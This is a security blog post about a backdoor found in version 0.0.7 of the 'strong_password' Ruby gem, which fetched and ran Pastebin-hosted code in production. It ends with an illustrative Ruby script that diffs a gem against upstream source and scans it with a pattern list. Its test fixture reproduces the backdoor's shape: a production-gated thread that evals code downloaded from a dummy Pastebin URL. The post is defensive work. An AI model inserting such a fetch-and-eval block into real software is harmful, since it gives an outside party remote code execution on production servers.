Ruby on Rails
A Ruby developer has found a backdoor in a library used by Ruby on Rails (RoR) web apps. The backdoor was found in a third-party gem (Ruby library) called ‘strong_password’, version 0.0.7.
Any application that picked up the backdoored version could have been exposed, and developers using the gem are urged to upgrade to the latest clean version immediately.
The backdoor was identified by a developer named Tute Costa while he was updating the libraries used in his workplace. He found a bogus new version of the ‘strong_password’ gem carrying a backdoor that would let an attacker execute code remotely. When an application using the gem was deployed to production, the injected code could load malicious middleware into it.
He looked at the ‘strong_password’ gem on RubyGems.org but could find no changelog for the new release; the previous version dated from October 2018. On inspecting the published gem itself, he found that the mystery 0.0.7 version contained extra code that downloaded and ran a script hosted on pastebin.com, and did so only when the application was running in production.
Because the downloaded code ran inside the application, whoever controlled the Pastebin address could execute arbitrary code on any production site running the rogue gem. Sites that had updated to the rogue version of ‘strong_password’ could therefore be silently hijacked.
The rogue version had been published under an otherwise empty RubyGems account that did not belong to the library’s official maintainer. The backdoored release has since been pulled, and the maintainer has published a clean 0.0.8.
The hidden backdoor looks like a deliberate, targeted attack: it was inserted where users would not notice it straight away and was active only in production, so it would not show up in development or test runs. Thankfully Ruby has a wide community of developers who test and review updates to libraries on a regular basis.
This instance is another solid reminder that developers and systems administrators should look at what actually changed in a dependency (the diff between the published package and the previous release or the upstream source, not just the changelog or version number) before rolling any update out to internal systems, and should pin dependency versions in a lockfile so that new releases do not arrive unreviewed.
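As an added illustration of that advice (this is example code written for this post, not code from the strong_password project or from Tute Costa’s analysis), the script below does two things a practitioner can run before deploying a gem update: it compares an unpacked gem against a source checkout to list files that were added, removed or changed, and it scans the gem’s Ruby files for the kind of constructs a password-strength library has no reason to contain, modelled on the behaviour described above (remote code fetched and evaluated, a paste-site URL, execution gated on the Rails production environment). The fixture it runs against is constructed for the example: the “backdoored” file is a placeholder shaped like the described backdoor with a dummy URL, not the real 0.0.7 payload, and the file path is assumed.

```ruby
# frozen_string_literal: true
require "tmpdir"
require "fileutils"
require "digest"

# Patterns that have no business in a password-strength library. They reflect the
# shape of the backdoor as described in the article: code fetched over the network
# and eval'd, a paste-site URL, and a production-only gate.
SUSPICIOUS = {
  "evaluates code fetched over the network" =>
    /\beval\b[^\n]*(?:Net::HTTP|URI\.open|OpenURI|TCPSocket)/,
  "references a paste site"             => /pastebin\.com/i,
  "gated on the production environment" => /Rails\.env(?:\.production\?|\[0\]\s*==\s*["']p["'])/,
  "spawns a background thread"          => /Thread\.new/,
  "swallows every exception"            => /rescue\s+Exception\b/,
}.freeze

# Scan one Ruby source string. Returns [[line_number, description], ...].
def scan_source(src)
  findings = []
  src.each_line.with_index(1) do |line, no|
    SUSPICIOUS.each { |desc, re| findings << [no, desc] if line.match?(re) }
  end
  findings
end

# Scan every .rb file under an unpacked gem directory; keys are paths relative to dir.
def scan_gem_dir(dir)
  Dir.glob("**/*.rb", base: dir).sort.each_with_object({}) do |rel, out|
    hits = scan_source(File.read(File.join(dir, rel)))
    out[rel] = hits unless hits.empty?
  end
end

# Compare an unpacked gem against a source checkout of the tag it claims to be
# built from: which .rb files were added, removed, or have different content.
def diff_trees(gem_dir, repo_dir)
  files = ->(d) { Dir.glob("**/*.rb", base: d).sort }
  a, b = files.call(gem_dir), files.call(repo_dir)
  sha = ->(d, f) { Digest::SHA256.file(File.join(d, f)).hexdigest }
  changed = (a & b).reject { |f| sha.call(gem_dir, f) == sha.call(repo_dir, f) }
  { added: a - b, removed: b - a, changed: changed }
end

# Constructed fixture: a harmless placeholder for the library's own code.
CLEAN = <<~RUBY
  module StrongPassword
    class StrengthChecker
      def strong?(password) # placeholder logic, not the gem's real algorithm
        password.length >= 12
      end
    end
  end
RUBY

# Constructed fixture: the same file with a block appended in the shape the article
# describes. The URL is a dummy and nothing here is ever executed; it is only scanned.
BACKDOORED = CLEAN + <<~RUBY
  def _!; begin; yield; rescue Exception; end; end
  _!{ Thread.new { loop { _!{ sleep rand * 3333
        eval(Net::HTTP.get(URI("https://pastebin.com/raw/EXAMPLE")), binding) } } } if Rails.env[0] == "p" }
RUBY

# Build the two trees in a temp dir and run both checks; returns the results.
def demo
  Dir.mktmpdir do |tmp|
    gem_dir  = File.join(tmp, "gem")   # stands in for `gem unpack` output
    repo_dir = File.join(tmp, "repo")  # stands in for a git checkout of the tag
    rel = "lib/strong_password/strength_checker.rb" # assumed path, for the fixture only
    [gem_dir, repo_dir].each { |d| FileUtils.mkdir_p(File.dirname(File.join(d, rel))) }
    File.write(File.join(repo_dir, rel), CLEAN)
    File.write(File.join(gem_dir, rel), BACKDOORED)
    { diff: diff_trees(gem_dir, repo_dir), scan: scan_gem_dir(gem_dir) }
  end
end

if $PROGRAM_NAME == __FILE__
  result = demo
  puts "changed: #{result[:diff][:changed].inspect}"
  result[:scan].each { |f, hits| hits.each { |no, why| puts "#{f}:#{no}: #{why}" } }
end
```

To use the same two checks on a real update, fetch and unpack the published artefact with `gem fetch NAME -v VERSION` and `gem unpack NAME-VERSION.gem`, clone the upstream repository at the matching tag, and pass those two directories to `diff_trees` and the unpacked gem directory to `scan_gem_dir`. Files that differ from upstream are the ones worth reading by hand; the pattern scan is only a tripwire and will not catch a backdoor written to avoid these strings.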
Did you have the 0.0.7 version installed? Let us know in the comments or Tweet us @Hyve!